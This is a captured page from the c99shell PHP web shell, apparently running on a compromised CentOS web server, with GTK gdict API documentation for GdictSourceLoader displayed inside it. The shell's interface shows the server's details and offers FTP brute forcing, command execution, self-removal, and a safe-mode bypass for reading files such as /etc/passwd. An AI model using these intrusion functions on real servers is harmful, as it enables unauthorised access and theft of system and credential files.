!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/gdict/   drwxr-xr-x
Free 51.95 GB of 127.8 GB (40.65%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     gdict-GdictSourceLoader.html (15.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
GdictSourceLoader

GdictSourceLoader

GdictSourceLoader —

Description

Details

GdictSourceLoaderPrivate

typedef struct _GdictSourceLoaderPrivate GdictSourceLoaderPrivate;


GdictSourceLoader

typedef struct {
} GdictSourceLoader;


gdict_source_loader_new ()

GdictSourceLoader* gdict_source_loader_new  (void);

Creates a new GdictSourceLoader object. This object is used to search into a list of paths for dictionary source files. See GdictSource for more informations about the format of dictionary source files.

Returns : a new GdictSourceLoader object

Since 1.0


gdict_source_loader_update ()

void        gdict_source_loader_update      (GdictSourceLoader *loader);

Queue an update of the sources inside loader.

loader : a GdictSourceLoader

Since 1.0


gdict_source_loader_add_search_path ()

void        gdict_source_loader_add_search_path
                                            (GdictSourceLoader *loader,
                                             const gchar *path);

Adds path to the search paths list of loader.

loader : a GdictSourceLoader
path : a path to be added to the search path list

Since 1.0


gdict_source_loader_get_paths ()

const GSList* gdict_source_loader_get_paths (GdictSourceLoader *loader);

Gets the list of paths used by loader to search for dictionary source files.

loader : a GdictSourceLoader
Returns : a list containing the paths. The returned list is owned by the GdictSourceLoader object and should never be free or modified.

Since 1.0


gdict_source_loader_get_names ()

gchar**     gdict_source_loader_get_names   (GdictSourceLoader *loader,
                                             gsize *length);

Retrieves the list of dictionary source names available into the search paths of loader.

loader : a GdictSourceLoader
length : return location for the number of source names, or NULL
Returns : a newly allocated, NULL terminated array of strings. You should free the returned string array with g_strfreev()

Since 1.0


gdict_source_loader_get_sources ()

const GSList* gdict_source_loader_get_sources
                                            (GdictSourceLoader *loader);

Retrieves the list of dictionary sources available into the search paths of loader, in form of GdictSource objects.

loader : a GdictSourceLoader
Returns : a list of GdictSource objects. The returned list is owned by the GdictSourceLoader object, and should never be freed or modified.

Since 1.0


gdict_source_loader_get_source ()

GdictSource* gdict_source_loader_get_source (GdictSourceLoader *loader,
                                             const gchar *name);

Retrieves a dictionary source using name. You can use the returned GdictSource object to create the right GdictContext for that dictionary source.

loader : a GdictSourceLoader
name : a name of a dictionary source
Returns : a referenced GdictSource object. You should de-reference it using g_object_unref() when you finished using it.

Since 1.0


gdict_source_loader_remove_source ()

gboolean    gdict_source_loader_remove_source
                                            (GdictSourceLoader *loader,
                                             const gchar *name);

Removes the dictionary source name from loader. This function will also remove the dictionary source definition file bound to it.

loader : a GdictSourceLoader
name : name of a dictionary source
Returns : TRUE if the dictionary source was successfully removed

Since 1.0


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0127 ]--